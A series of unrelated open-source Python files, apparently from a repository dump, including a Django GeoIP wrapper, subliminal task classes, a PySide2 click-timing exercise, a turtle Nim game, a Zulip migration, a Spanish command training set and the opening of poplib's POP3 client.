file. Defaults to 'GeoLiteCity.dat'; overrides the GEOIP_CITY settings attribute. """ # Checking the given cache option. if cache in self.cache_options: self._cache = self.cache_options[cache] else: raise GeoIPException('Invalid caching option: %s' % cache) # Getting the GeoIP data path. if not path: path = GEOIP_SETTINGS.get('GEOIP_PATH', None) if not path: raise GeoIPException('GeoIP path must be provided via parameter or the GEOIP_PATH setting.') if not isinstance(path, basestring): raise TypeError('Invalid path type: %s' % type(path).__name__) cntry_ptr, city_ptr = (None, None) if os.path.isdir(path): # Getting the country and city files using the settings # dictionary. If no settings are provided, default names # are assigned. country = os.path.join(path, country or GEOIP_SETTINGS.get('GEOIP_COUNTRY', 'GeoIP.dat')) city = os.path.join(path, city or GEOIP_SETTINGS.get('GEOIP_CITY', 'GeoLiteCity.dat')) elif os.path.isfile(path): # Otherwise, some detective work will be needed to figure # out whether the given database path is for the GeoIP country # or city databases. ptr = geoip_open(path, cache) info = geoip_dbinfo(ptr) if lite_regex.match(info): # GeoLite City database. city, city_ptr = path, ptr elif free_regex.match(info): # GeoIP Country database. country, cntry_ptr = path, ptr else: raise GeoIPException('Unable to recognize database edition: %s' % info) else: raise GeoIPException('GeoIP path must be a valid file or directory.') # `_init_db` does the dirty work. self._init_db(country, cache, '_country', cntry_ptr) self._init_db(city, cache, '_city', city_ptr) def _init_db(self, db_file, cache, attname, ptr=None): "Helper routine for setting GeoIP ctypes database properties." if ptr: # Pointer already retrieved. pass elif os.path.isfile(db_file or ''): ptr = geoip_open(db_file, cache) setattr(self, attname, ptr) setattr(self, '%s_file' % attname, db_file) def _check_query(self, query, country=False, city=False, city_or_country=False): "Helper routine for checking the query and database availability." # Making sure a string was passed in for the query. if not isinstance(query, basestring): raise TypeError('GeoIP query must be a string, not type %s' % type(query).__name__) # Extra checks for the existence of country and city databases. if city_or_country and self._country is None and self._city is None: raise GeoIPException('Invalid GeoIP country and city data files.') elif country and self._country is None: raise GeoIPException('Invalid GeoIP country data file: %s' % self._country_file) elif city and self._city is None: raise GeoIPException('Invalid GeoIP city data file: %s' % self._city_file) def city(self, query): """ Returns a dictionary of city information for the given IP address or Fully Qualified Domain Name (FQDN). Some information in the dictionary may be undefined (None). """ self._check_query(query, city=True) if ipregex.match(query): # If an IP address was passed in ptr = rec_by_addr(self._city, c_char_p(query)) else: # If a FQDN was passed in. ptr = rec_by_name(self._city, c_char_p(query)) # Checking the pointer to the C structure, if valid pull out elements # into a dicionary and return. if bool(ptr): record = ptr.contents return dict((tup[0], getattr(record, tup[0])) for tup in record._fields_) else: return None def country_code(self, query): "Returns the country code for the given IP Address or FQDN." self._check_query(query, city_or_country=True) if self._country: if ipregex.match(query): return cntry_code_by_addr(self._country, query) else: return cntry_code_by_name(self._country, query) else: return self.city(query)['country_code'] def country_name(self, query): "Returns the country name for the given IP Address or FQDN." self._check_query(query, city_or_country=True) if self._country: if ipregex.match(query): return cntry_name_by_addr(self._country, query) else: return cntry_name_by_name(self._country, query) else: return self.city(query)['country_name'] def country(self, query): """ Returns a dictonary with with the country code and name when given an IP address or a Fully Qualified Domain Name (FQDN). For example, both '24.124.1.80' and 'djangoproject.com' are valid parameters. """ # Returning the country code and name return {'country_code' : self.country_code(query), 'country_name' : self.country_name(query), } #### Coordinate retrieval routines #### def coords(self, query, ordering=('longitude', 'latitude')): cdict = self.city(query) if cdict is None: return None else: return tuple(cdict[o] for o in ordering) def lon_lat(self, query): "Returns a tuple of the (longitude, latitude) for the given query." return self.coords(query) def lat_lon(self, query): "Returns a tuple of the (latitude, longitude) for the given query." return self.coords(query, ('latitude', 'longitude')) def geos(self, query): "Returns a GEOS Point object for the given query." ll = self.lon_lat(query) if ll: from django.contrib.gis.geos import Point return Point(ll, srid=4326) else: return None #### GeoIP Database Information Routines #### def country_info(self): "Returns information about the GeoIP country database." if self._country is None: ci = 'No GeoIP Country data in "%s"' % self._country_file else: ci = geoip_dbinfo(self._country) return ci country_info = property(country_info) def city_info(self): "Retuns information about the GeoIP city database." if self._city is None: ci = 'No GeoIP City data in "%s"' % self._city_file else: ci = geoip_dbinfo(self._city) return ci city_info = property(city_info) def info(self): "Returns information about all GeoIP databases in use." return 'Country:\n\t%s\nCity:\n\t%s' % (self.country_info, self.city_info) info = property(info) #### Methods for compatibility w/the GeoIP-Python API. #### @classmethod def open(cls, full_path, cache): return GeoIP(full_path, cache) def _rec_by_arg(self, arg): if self._city: return self.city(arg) else: return self.country(arg) region_by_addr = city region_by_name = city record_by_addr = _rec_by_arg record_by_name = _rec_by_arg country_code_by_addr = country_code country_code_by_name = country_code country_name_by_addr = country_name country_name_by_name = country_name
drglove/SickRage
refs/heads/master
lib/subliminal/tasks.py
170
# -*- coding: utf-8 -*- # Copyright 2011-2012 Antoine Bertin <diaoulael@gmail.com> # # This file is part of subliminal. # # subliminal is free software; you can redistribute it and/or modify it under # the terms of the GNU Lesser General Public License as published by # the Free Software Foundation; either version 3 of the License, or # (at your option) any later version. # # subliminal is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public License # along with subliminal. If not, see <http://www.gnu.org/licenses/>. __all__ = ['Task', 'ListTask', 'DownloadTask', 'StopTask'] class Task(object): """Base class for tasks to use in subliminal""" pass class ListTask(Task): """List task used by the worker to search for subtitles :param video: video to search subtitles for :type video: :class:`~subliminal.videos.Video` :param list languages: languages to search for :param string service: name of the service to use :param config: configuration for the service :type config: :class:`~subliminal.services.ServiceConfig` """ def __init__(self, video, languages, service, config): super(ListTask, self).__init__() self.video = video self.service = service self.languages = languages self.config = config def __repr__(self): return 'ListTask(%r, %r, %s, %r)' % (self.video, self.languages, self.service, self.config) class DownloadTask(Task): """Download task used by the worker to download subtitles :param video: video to download subtitles for :type video: :class:`~subliminal.videos.Video` :param subtitles: subtitles to download in order of preference :type subtitles: list of :class:`~subliminal.subtitles.Subtitle` """ def __init__(self, video, subtitles): super(DownloadTask, self).__init__() self.video = video self.subtitles = subtitles def __repr__(self): return 'DownloadTask(%r, %r)' % (self.video, self.subtitles) class StopTask(Task): """Stop task that will stop the worker""" pass
captain-proton/aise
refs/heads/master
hci/exercise_8/src/main/python/main.py
1
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import sys import random import math import csv from PySide2.QtCore import Qt, Slot, Signal, QObject, QPoint from PySide2.QtGui import QPainter, QBrush, QPen, QColor, QMouseEvent from PySide2.QtWidgets import\ (QAction, QApplication, QMainWindow, QStatusBar, QVBoxLayout, QWidget) from fbs_runtime.application_context.PySide2 import ApplicationContext from datetime import datetime, timedelta from dataclasses import dataclass WINDOW_BG_COLOR = 'rgb(227,242,253)' DRAW_AREA_BG_COLOR = 'rgb(187,222,251)' DRAW_AREA_BORDER_COLOR = 'rgb(130,177,255)' CIRCLE_BORDER_COLOR = QColor.fromRgb(230, 81, 0) CIRCLE_COLOR = QColor.fromRgb(255, 183, 77) CIRCLE_RADII = [10, 30, 50] TRIALS = 90 MIN_CIRCLE_DISTANCE = 30 def calculate_distance(x1: int, y1: int, x2: int, y2: int): a = math.pow(x1 - x2, 2) b = math.pow(y1 - y2, 2) distance = math.sqrt(a + b) return distance @dataclass class Circle(): radius: int circle_pos: QPoint click_pos: QPoint click_time: datetime class Comm(QObject): circle_clicked = Signal(Circle) class CircleDrawer(QWidget): def __init__(self, radius: int): QWidget.__init__(self) self.comm = Comm() self.radius = radius def paintEvent(self, paintEvent): if not hasattr(self, 'circle_pos'): x = random.randint(0, self.width() - self.radius * 2) y = random.randint(0, self.height() - self.radius * 2) self._circle_pos = QPoint(x, y) pen = QPen(CIRCLE_BORDER_COLOR) brush = QBrush(CIRCLE_COLOR, Qt.SolidPattern) painter = QPainter(self) painter.setPen(pen) painter.setBrush(brush) painter.setRenderHint(QPainter.Antialiasing) painter.drawEllipse(self.circle_pos.x(), self.circle_pos.y(), self.radius * 2, self.radius * 2) def mouseReleaseEvent(self, event: QMouseEvent): event_x = event.pos().x() event_y = event.pos().y() distance = calculate_distance(self.circle_pos.x() + self.radius, self.circle_pos.y() + self.radius, event_x, event_y) if distance <= self.radius: circle = Circle(radius=self.radius, circle_pos=self.circle_pos, click_pos=QPoint(event_x, event_y), click_time=datetime.now()) self.comm.circle_clicked.emit(circle) @property def circle_pos(self): if hasattr(self, '_circle_pos'): return self._circle_pos return None @circle_pos.setter def circle_pos(self, position: QPoint): if not isinstance(position, QPoint): return self._circle_pos = position @property def circle_center_x(self): return self._circle_pos.x() + self.radius @property def circle_center_y(self): return self._circle_pos.y() + self.radius class CircleContainer(QWidget): def __init__(self): QWidget.__init__(self) self.comm = Comm() self.clicked_circles = [] self.finished = False self.circle_queue = CIRCLE_RADII * int(TRIALS / len(CIRCLE_RADII)) random.shuffle(self.circle_queue) # outer widget that draws the border self.container = QWidget() style = (f'background-color: {DRAW_AREA_BG_COLOR};' f'border: 1px solid {DRAW_AREA_BORDER_COLOR};') self.container.setStyleSheet(style) self.container_layout = QVBoxLayout() self.container_layout.setContentsMargins(0, 0, 0, 0) # inner widget that draws the circles. can't use a combination # at this point as the border is removed if paintEvent is # overidden radius = self.get_new_radius() x, y = self.calculate_new_draw_position(radius) self.draw_circle(radius, x, y) self.container.setLayout(self.container_layout) # set layout of this widget (container -> drawer) self.layout = QVBoxLayout() self.layout.setContentsMargins(0, 0, 0, 0) self.layout.addWidget(self.container) self.setLayout(self.layout) @Slot(Circle) def on_circle_clicked(self, circle: Circle): self.clicked_circles.append(circle) self.container_layout.removeWidget(self.draw_area) self.draw_area.close() if len(self.circle_queue) > 0: radius = self.get_new_radius() x, y = self.calculate_new_draw_position(radius) self.draw_circle(radius, x, y) else: self.finished = True self.comm.circle_clicked.emit(circle) def calculate_new_draw_position(self, radius: int): max_x = self.container.width() - radius * 2 max_y = self.container.height() - radius * 2 x, y = (random.randint(0, max_x), random.randint(0, max_y)) distance = math.inf if hasattr(self, 'draw_area'): circle_center_x = self.draw_area.circle_center_x circle_center_y = self.draw_area.circle_center_y distance = calculate_distance(circle_center_x, circle_center_y, x, y) return (x, y)\ if distance >= MIN_CIRCLE_DISTANCE\ else self.calculate_new_draw_position() def get_new_radius(self): return self.circle_queue.pop() def draw_circle(self, radius: int, x: int, y: int): self.draw_area = CircleDrawer(radius) self.draw_area.circle_pos = QPoint(x, y) self.draw_area.comm.circle_clicked.connect(self.on_circle_clicked) self.container_layout.addWidget(self.draw_area) class MainWindow(QMainWindow): def __init__(self): QMainWindow.__init__(self) self.setWindowTitle("Exercise 8B - Verheyen") self.setStyleSheet(f'background-color: {WINDOW_BG_COLOR};') self.start_time = datetime.now() self.circle_container = CircleContainer() self.circle_container.comm.circle_clicked.connect( self.on_circle_clicked) self.setCentralWidget(self.circle_container) self.status = QStatusBar() self.status.showMessage("Hello HCI Exercise 8B", 3000) self.setStatusBar(self.status) def update_status(self, circle: Circle): prev_time = self.circle_container.clicked_circles[-2].click_time\ if len(self.circle_container.clicked_circles) > 1\ else self.start_time diff = circle.click_time - prev_time millis = diff.microseconds / 1000 diff_fmt = f'{diff.seconds}.{millis}' self.status.showMessage(f"Deleted circle (radius={circle.radius}," f" x={circle.circle_pos.x()}," f" y={circle.circle_pos.y()}) after {diff}", 3000) def save_clicks(self): filename = f'clicks_{datetime.now()}.csv' with open(filename, 'w') as output: writer = csv.writer(output) for circle in self.circle_container.clicked_circles: writer.writerow([circle.circle_pos.x(), circle.circle_pos.y(), circle.click_pos.x(), circle.click_pos.y(), circle.click_time, circle.radius]) @Slot(int, int) def on_circle_clicked(self, circle: Circle): self.update_status(circle) if self.circle_container.finished: self.save_clicks() if __name__ == "__main__": appctxt = ApplicationContext() window = MainWindow() window.showMaximized() exit_code = appctxt.app.exec_() sys.exit(exit_code)
lokirius/python-for-android
refs/heads/master
python3-alpha/python3-src/Lib/turtledemo/nim.py
65
""" turtle-example-suite: tdemo_nim.py Play nim against the computer. The player who takes the last stick is the winner. Implements the model-view-controller design pattern. """ import turtle import random import time SCREENWIDTH = 640 SCREENHEIGHT = 480 MINSTICKS = 7 MAXSTICKS = 31 HUNIT = SCREENHEIGHT // 12 WUNIT = SCREENWIDTH // ((MAXSTICKS // 5) * 11 + (MAXSTICKS % 5) * 2) SCOLOR = (63, 63, 31) HCOLOR = (255, 204, 204) COLOR = (204, 204, 255) def randomrow(): return random.randint(MINSTICKS, MAXSTICKS) def computerzug(state): xored = state[0] ^ state[1] ^ state[2] if xored == 0: return randommove(state) for z in range(3): s = state[z] ^ xored if s <= state[z]: move = (z, s) return move def randommove(state): m = max(state) while True: z = random.randint(0,2) if state[z] > (m > 1): break rand = random.randint(m > 1, state[z]-1) return z, rand class NimModel(object): def __init__(self, game): self.game = game def setup(self): if self.game.state not in [Nim.CREATED, Nim.OVER]: return self.sticks = [randomrow(), randomrow(), randomrow()] self.player = 0 self.winner = None self.game.view.setup() self.game.state = Nim.RUNNING def move(self, row, col): maxspalte = self.sticks[row] self.sticks[row] = col self.game.view.notify_move(row, col, maxspalte, self.player) if self.game_over(): self.game.state = Nim.OVER self.winner = self.player self.game.view.notify_over() elif self.player == 0: self.player = 1 row, col = computerzug(self.sticks) self.move(row, col) self.player = 0 def game_over(self): return self.sticks == [0, 0, 0] def notify_move(self, row, col): if self.sticks[row] <= col: return self.move(row, col) class Stick(turtle.Turtle): def __init__(self, row, col, game): turtle.Turtle.__init__(self, visible=False) self.row = row self.col = col self.game = game x, y = self.coords(row, col) self.shape("square") self.shapesize(HUNIT/10.0, WUNIT/20.0) self.speed(0) self.pu() self.goto(x,y) self.color("white") self.showturtle() def coords(self, row, col): packet, remainder = divmod(col, 5) x = (3 + 11 * packet + 2 * remainder) * WUNIT y = (2 + 3 * row) * HUNIT return x - SCREENWIDTH // 2 + WUNIT // 2, SCREENHEIGHT // 2 - y - HUNIT // 2 def makemove(self, x, y): if self.game.state != Nim.RUNNING: return self.game.controller.notify_move(self.row, self.col) class NimView(object): def __init__(self, game): self.game = game self.screen = game.screen self.model = game.model self.screen.colormode(255) self.screen.tracer(False) self.screen.bgcolor((240, 240, 255)) self.writer = turtle.Turtle(visible=False) self.writer.pu() self.writer.speed(0) self.sticks = {} for row in range(3): for col in range(MAXSTICKS): self.sticks[(row, col)] = Stick(row, col, game) self.display("... a moment please ...") self.screen.tracer(True) def display(self, msg1, msg2=None): self.screen.tracer(False) self.writer.clear() if msg2 is not None: self.writer.goto(0, - SCREENHEIGHT // 2 + 48) self.writer.pencolor("red") self.writer.write(msg2, align="center", font=("Courier",18,"bold")) self.writer.goto(0, - SCREENHEIGHT // 2 + 20) self.writer.pencolor("black") self.writer.write(msg1, align="center", font=("Courier",14,"bold")) self.screen.tracer(True) def setup(self): self.screen.tracer(False) for row in range(3): for col in range(self.model.sticks[row]): self.sticks[(row, col)].color(SCOLOR) for row in range(3): for col in range(self.model.sticks[row], MAXSTICKS): self.sticks[(row, col)].color("white") self.display("Your turn! Click leftmost stick to remove.") self.screen.tracer(True) def notify_move(self, row, col, maxspalte, player): if player == 0: farbe = HCOLOR for s in range(col, maxspalte): self.sticks[(row, s)].color(farbe) else: self.display(" ... thinking ... ") time.sleep(0.5) self.display(" ... thinking ... aaah ...") farbe = COLOR for s in range(maxspalte-1, col-1, -1): time.sleep(0.2) self.sticks[(row, s)].color(farbe) self.display("Your turn! Click leftmost stick to remove.") def notify_over(self): if self.game.model.winner == 0: msg2 = "Congrats. You're the winner!!!" else: msg2 = "Sorry, the computer is the winner." self.display("To play again press space bar. To leave press ESC.", msg2) def clear(self): if self.game.state == Nim.OVER: self.screen.clear() class NimController(object): def __init__(self, game): self.game = game self.sticks = game.view.sticks self.BUSY = False for stick in self.sticks.values(): stick.onclick(stick.makemove) self.game.screen.onkey(self.game.model.setup, "space") self.game.screen.onkey(self.game.view.clear, "Escape") self.game.view.display("Press space bar to start game") self.game.screen.listen() def notify_move(self, row, col): if self.BUSY: return self.BUSY = True self.game.model.notify_move(row, col) self.BUSY = False class Nim(object): CREATED = 0 RUNNING = 1 OVER = 2 def __init__(self, screen): self.state = Nim.CREATED self.screen = screen self.model = NimModel(self) self.view = NimView(self) self.controller = NimController(self) mainscreen = turtle.Screen() mainscreen.mode("standard") mainscreen.setup(SCREENWIDTH, SCREENHEIGHT) def main(): nim = Nim(mainscreen) return "EVENTLOOP!" if __name__ == "__main__": main() turtle.mainloop()
jackrzhang/zulip
refs/heads/master
zerver/migrations/0090_userprofile_high_contrast_mode.py
16
# -*- coding: utf-8 -*- # Generated by Django 1.11.2 on 2017-07-07 15:58 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('zerver', '0089_auto_20170710_1353'), ] operations = [ migrations.AddField( model_name='userprofile', name='high_contrast_mode', field=models.BooleanField(default=False), ), ]
larvasapiens/htm-teul
refs/heads/master
Learning/SpanishTestSet.py
1
""" Automatically generated Test Data Set """ trainingData = ( (['mover', 'a', 'el', 'este'], ['mover-event', 'derecha-event']), (['mover', 'a', 'arriba'], ['mover-event', 'arriba-event']), (['mover', 'a', 'el', 'sur'], ['mover-event', 'abajo-event']), (['mover', 'parala', 'izquierda'], ['mover-event', 'izquierda-event']), (['por', 'favor', 'mover', 'a', 'el', 'este'], ['mover-event', 'derecha-event']), (['por', 'favor', 'mover', 'a', 'la', 'izquierda'], ['mover-event', 'izquierda-event']), (['por', 'favor', 'mover', 'a', 'el', 'sur'], ['mover-event', 'abajo-event']), (['por', 'favor', 'mover', 'hacia', 'la', 'derecha'], ['mover-event', 'derecha-event']), (['por', 'favor', 'mover', 'hacia', 'el', 'este'], ['mover-event', 'derecha-event']), (['por', 'favor', 'mover', 'hacia', 'arriba'], ['mover-event', 'arriba-event']), (['por', 'favor', 'mover', 'parael', 'sur'], ['mover-event', 'abajo-event']), (['quiero', 'que', 'te', 'muevas', 'a', 'arriba'], ['mover-event', 'arriba-event']), (['quiero', 'que', 'te', 'muevas', 'a', 'abajo'], ['mover-event', 'abajo-event']), (['quiero', 'que', 'te', 'muevas', 'hacia', 'abajo'], ['mover-event', 'abajo-event']), (['quiero', 'que', 'te', 'muevas', 'parael', 'oeste'], ['mover-event', 'izquierda-event']), (['quiero', 'que', 'te', 'muevas', 'parael', 'norte'], ['mover-event', 'arriba-event']), (['quiero', 'que', 'te', 'muevas', 'parael', 'sur'], ['mover-event', 'abajo-event']), (['moverse', 'a', 'el', 'este'], ['mover-event', 'derecha-event']), (['moverse', 'a', 'el', 'oeste'], ['mover-event', 'izquierda-event']), (['moverse', 'a', 'abajo'], ['mover-event', 'abajo-event']), (['moverse', 'hacia', 'la', 'derecha'], ['mover-event', 'derecha-event']), (['moverse', 'hacia', 'la', 'izquierda'], ['mover-event', 'izquierda-event']), (['moverse', 'hacia', 'el', 'sur'], ['mover-event', 'abajo-event']), (['moverse', 'parala', 'derecha'], ['mover-event', 'derecha-event']), (['moverse', 'parael', 'este'], ['mover-event', 'derecha-event']), (['\xc2\xbf', 'podrias', 'moverlo', 'a', 'arriba', '?'], ['mover-event', 'arriba-event']), (['\xc2\xbf', 'podrias', 'moverlo', 'parala', 'derecha', '?'], ['mover-event', 'derecha-event']), (['muevete', 'paraabajo', 'por', 'favor'], ['mover-event', 'abajo-event']), (['ve', 'hacia', 'el', 'sur'], ['mover-event', 'abajo-event']), (['ve', 'parala', 'derecha'], ['mover-event', 'derecha-event']), (['ve', 'parael', 'este'], ['mover-event', 'derecha-event']), (['ve', 'parael', 'oeste'], ['mover-event', 'izquierda-event']), (['dirigite', 'a', 'la', 'izquierda'], ['mover-event', 'izquierda-event']), (['dirigite', 'a', 'arriba'], ['mover-event', 'arriba-event']), (['dirigite', 'a', 'abajo'], ['mover-event', 'abajo-event']), (['dirigite', 'hacia', 'el', 'este'], ['mover-event', 'derecha-event']), (['dirigite', 'hacia', 'la', 'izquierda'], ['mover-event', 'izquierda-event']), (['dirigite', 'hacia', 'el', 'norte'], ['mover-event', 'arriba-event']), (['dirigite', 'hacia', 'abajo'], ['mover-event', 'abajo-event']), (['dirigite', 'parala', 'derecha'], ['mover-event', 'derecha-event']), (['dirigite', 'parael', 'este'], ['mover-event', 'derecha-event']), (['dirigite', 'parala', 'izquierda'], ['mover-event', 'izquierda-event']), (['dirigite', 'parael', 'oeste'], ['mover-event', 'izquierda-event']), (['dirigite', 'paraabajo'], ['mover-event', 'abajo-event']), (['gira', 'a', 'el', 'oeste'], ['mover-event', 'izquierda-event']), (['gira', 'hacia', 'el', 'oeste'], ['mover-event', 'izquierda-event']), (['gira', 'parael', 'oeste'], ['mover-event', 'izquierda-event']), (['gira', 'parael', 'sur'], ['mover-event', 'abajo-event']), (['vuleve', 'a', 'abajo'], ['mover-event', 'abajo-event']), (['vuleve', 'parala', 'derecha'], ['mover-event', 'derecha-event']), (['ir', 'a', 'el', 'oeste'], ['mover-event', 'izquierda-event']), (['ir', 'a', 'el', 'sur'], ['mover-event', 'abajo-event']), (['ir', 'hacia', 'el', 'este'], ['mover-event', 'derecha-event']), (['ir', 'hacia', 'la', 'izquierda'], ['mover-event', 'izquierda-event']), (['ir', 'hacia', 'el', 'oeste'], ['mover-event', 'izquierda-event']), (['desplazate', 'a', 'la', 'derecha'], ['mover-event', 'derecha-event']), (['desplazate', 'a', 'el', 'este'], ['mover-event', 'derecha-event']), (['desplazate', 'a', 'el', 'norte'], ['mover-event', 'arriba-event']), (['desplazate', 'hacia', 'la', 'izquierda'], ['mover-event', 'izquierda-event']), (['desplazate', 'parael', 'este'], ['mover-event', 'derecha-event']), (['desplazate', 'parael', 'norte'], ['mover-event', 'arriba-event']), (['desplazate', 'paraabajo'], ['mover-event', 'abajo-event']), (['desplazate', 'parael', 'sur'], ['mover-event', 'abajo-event']), (['\xc2\xbf', 'bailamos', '?'], ['bailar-event', 'nothing-event']), (['recoge', 'el', 'objeto'], ['recoger-event', 'nothing-event']), (['recoge', 'el', 'sombrero', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['recoge', 'lo', 'que', 'esta', 'ahi', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'recoge', 'el', 'objeto'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'recoge', 'lo', 'que', 'esta', 'ahi'], ['recoger-event', 'nothing-event']), (['alza', 'el', 'sombrero'], ['recoger-event', 'nothing-event']), (['alza', 'la', 'cachucha', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['alza', 'el', 'objeto', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'alza', 'el', 'sombrero'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'alza', 'la', 'cachucha'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'alza', 'la', 'cachucha', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['levanta', 'el', 'objeto'], ['recoger-event', 'nothing-event']), (['levanta', 'lo', 'que', 'esta', 'ahi', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'levanta', 'el', 'sombrero'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'levanta', 'la', 'cachucha'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'levanta', 'lo', 'que', 'esta', 'ahi', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['ponte', 'la', 'cachucha'], ['recoger-event', 'nothing-event']), (['ponte', 'lo', 'que', 'esta', 'ahi'], ['recoger-event', 'nothing-event']), (['ponte', 'la', 'cachucha', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'ponte', 'el', 'objeto'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'ponte', 'el', 'sombrero', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'ponte', 'la', 'cachucha', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'ponte', 'lo', 'que', 'esta', 'ahi', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['recogelo', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'recogelo', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['alzalo'], ['recoger-event', 'nothing-event']), (['alzalo', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'alzalo', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['levantalo'], ['recoger-event', 'nothing-event']), (['levantalo'], ['recoger-event', 'nothing-event']), (['levantalo', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'levantalo'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'levantalo', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'levantalo', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'pontelo'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'pontelo', 'por', 'favor'], ['recoger-event', 'nothing-event']), ) inputIdx = {'actionInput': 1, 'wordInput': 0} categories = [set(['el', 've', 'este', 'bailemos', 'alza', 'gira', 'por', 'recogelo', ',', 'esqueleto', 'levantalo', 'hacia', 'parala', 'mover', 'tirutiru', 'desplazate', 'levanta', 'esta', '!', 'quiero', 'pares', 'objeto', 'la', 'moverse', 'sombrero', 'danza', 'baila', 'mueve', 'derecha', 'favor', 'ese', 'arriba', 'sur', 'tus', 'paraarriba', 'baldosa', 'te', 'no', '?', 'vamos', 'cachucha', 'podrias', 'ahi', 'parael', 'tiru', 'muevete', 'norte', 'de', 'abajo', 'bailar', 'alzalo', 'movimientos', 'samba', 'que', 'bailas', 'recoge', 'ver', 'azotar', 'oeste', 'a', 'moverlo', 'sabor', '\xc2\xa1', 'vuleve', 'bailamos', 'dirigite', 'titiru', 'lo', 'izquierda', 'pontelo', 'paraabajo', 'muevas', 'ponte', '\xc2\xbf', 'ir']), set(['derecha-event', 'mover-event', 'nothing-event', 'bailar-event', 'recoger-event', 'izquierda-event', 'arriba-event', 'abajo-event'])]
keyurpatel076/MissionPlannerGit
refs/heads/master
packages/IronPython.StdLib.2.7.4/content/Lib/poplib.py
223
"""A POP3 client class. Based on the J. Myers POP3 draft, Jan. 96 """ # Author: David Ascher <david_ascher@brown.edu> # [heavily stealing from nntplib.py] # Updated: Piers Lauder <piers@cs.su.oz.au> [Jul '97] # String method conversion and test jig improvements by ESR, February 2001. # Added the POP3_SSL class. Methods loosely based on IMAP_SSL. Hector Urtubia <urtubia@mrbook.org> Aug 2003 # Example (see the test function at the end of this file) # Imports import re, socket __all__ = ["POP3","error_proto"] # Exception raised when an error or invalid response is received: class error_proto(Exception): pass # Standard Port POP3_PORT = 110 # POP SSL PORT POP3_SSL_PORT = 995 # Line terminators (we always output CRLF, but accept any of CRLF, LFCR, LF) CR = '\r' LF = '\n' CRLF = CR+LF class POP3: """This class supports both the minimal and optional command sets. Arguments can be strings or integers (where appropriate) (e.g.: retr(1) and retr('1') both work equally well. Minimal Command Set: USER name user(name) PASS string pass_(string) STAT stat() LIST [msg] list(msg = None) RETR msg retr(msg) DELE msg dele(msg) NOOP noop() RSET rset() QUIT quit() Optional Commands (some servers support these): RPOP name rpop(name) APOP name digest apop(name, digest) TOP msg n top(msg, n) UIDL [msg] uidl(msg = None) Raises one exception: 'error_proto'. Instantiate with: POP3(hostname, port=110) NB: the POP protocol locks the mailbox from user authorization until QUIT, so be sure to get in, suck the messages, and quit, each time you access the mailbox. POP is a line-based protocol, which means large mail messages consume lots of python cycles reading them line-by-line. If it's available on your mail server, use IMAP4 instead, it doesn't suffer from the two problems above. """ def __init__(self, host, port=POP3_PORT, timeout=socket._GLOBAL_DEFAULT_TIMEOUT): self.host = host self.port = port self.sock = socket.create_connection((host, port), timeout) self.file = self.sock.makefile('rb') self._debugging = 0 self.welcome = self._getresp() def _putline(self, line): if self._debugging > 1: print '*put*', repr(line) self.sock.sendall('%s%s' % (line, CRLF)) # Internal: send one command to the server (through _putline()) def _putcmd(self, line): if self._debugging: print '*cmd*', repr(line) self._putline(line) # Internal: return one line from the server, stripping CRLF. # This is where all the CPU time of this module is consumed. # Raise error_proto('-ERR EOF') if the connection is closed. def _getline(self): line = self.file.readline() if self._debugging > 1: print '*get*', repr(line) if not line: raise error_proto('-ERR EOF') octets = len(line) # server can send any combination of CR & LF # however, 'readline()' returns lines ending in LF # so only possibilities are ...LF, ...CRLF, CR...LF if line[-2:] == CRLF: return line[:-2], octets if line[0] == CR: return line[1:-1], octets return line[:-1], octets # Internal: get a response from the server. # Raise 'error_proto' if the response doesn't start with '+'. def _getresp(self): resp, o = self._getline() if self._debugging > 1: print '*resp*', repr(resp) c = resp[:1] if c != '+': raise error_proto(resp) return resp # Internal: get a response plus following text from the server. def _getlongresp(self): resp = self._getresp() list = []; octets = 0 line, o = self._getline() while line != '.': if line[:2] == '..': o = o-1 line = line[1:] octets = octets + o list.append(line) line, o = self._getline() return resp, list, octets # Internal: send a command and get the response def _shortcmd(self, line): self._putcmd(line) return self._getresp() # Internal: send a command and get the response plus following text def _longcmd(self, line): self._putcmd(line) return self._getlongresp() # These can be useful: def getwelcome(self): return self.welcome def set_debuglevel(self, level): self._debugging = level # Here are all the POP commands: def user(self, user): """Send user name, return response (should indicate password required). """ return self._shortcmd('USER %s' % user) def pass_(self, pswd): """Send password, return response (response includes message count, mailbox size). NB: mailbox is locked by server from here to 'quit()' """ return self._shortcmd('PASS %s' % pswd) def stat(self): """Get mailbox status. Result is tuple of 2 ints (message count, mailbox size) """ retval = self._shortcmd('STAT') rets = retval.split() if self._debugging: print '*stat*', repr(rets) numMessages = int(rets[1]) sizeMessages = int(rets[2]) return (numMessages, sizeMessages) def list(self, which=None): """Request listing, return result. Result without a message number argument is in form ['response', ['mesg_num octets', ...], octets]. Result when a message number argument is given is a single response: the "scan listing" for that message. """ if which is not None: return 